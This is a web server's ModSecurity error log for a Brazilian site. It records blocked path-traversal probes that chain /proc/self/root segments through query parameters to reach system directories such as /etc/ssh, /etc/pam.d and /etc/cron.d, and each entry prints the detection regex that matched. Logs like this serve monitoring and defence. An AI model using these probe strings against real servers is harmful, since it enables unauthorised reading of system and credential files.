[Thu Mar 19 04:48:25.898625 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:43186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqSQkwaGbbGflqUZCECwAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:28.197401 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:43190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqTNa6ubjKNq_cu4YRAgAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:29.498958 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:36032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqTQkwaGbbGflqUZCEDwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:30.829137 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:36048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqTgkwaGbbGflqUZCEFAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:31.311975 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:51664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqT-oXxyEfFpUF8f_fyQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:32.131338 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:36062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqUOyqAr6etmhZHNoy1wAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:33.425038 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:36074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqUeyqAr6etmhZHNoy2QAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:35.896316 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:36076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqU9a6ubjKNq_cu4YRBQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:39.009809 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:36090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqV-oXxyEfFpUF8f_fzAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:41.363424 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:40612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqWeoXxyEfFpUF8f_f0QAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:43.758141 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.243.128:40628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqWxkFeYa1D6dYQnC9iwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:45.071991 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:40640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqXRkFeYa1D6dYQnC9jQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:46.371536 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:40642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqXhkFeYa1D6dYQnC9kAAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:47.782895 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:40654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqXwbLMZ6AikZjR9UstQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:49.356217 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:40660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqYda6ubjKNq_cu4YRDAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:52.434736 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.241.31:47558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqZF_V7PWP6ixUYl6LZgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:48:54.171290 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:37360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqZvu8EFLIOrSqIpttAQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:58.511338 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:37372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqasdf6f5d65gmYZRCtQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:59.491538 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:46092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqa9a6ubjKNq_cu4YRFQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:00.932924 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:43798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqbPu8EFLIOrSqIpttDAAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:02.569053 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:43840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqbhkFeYa1D6dYQnC9nQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
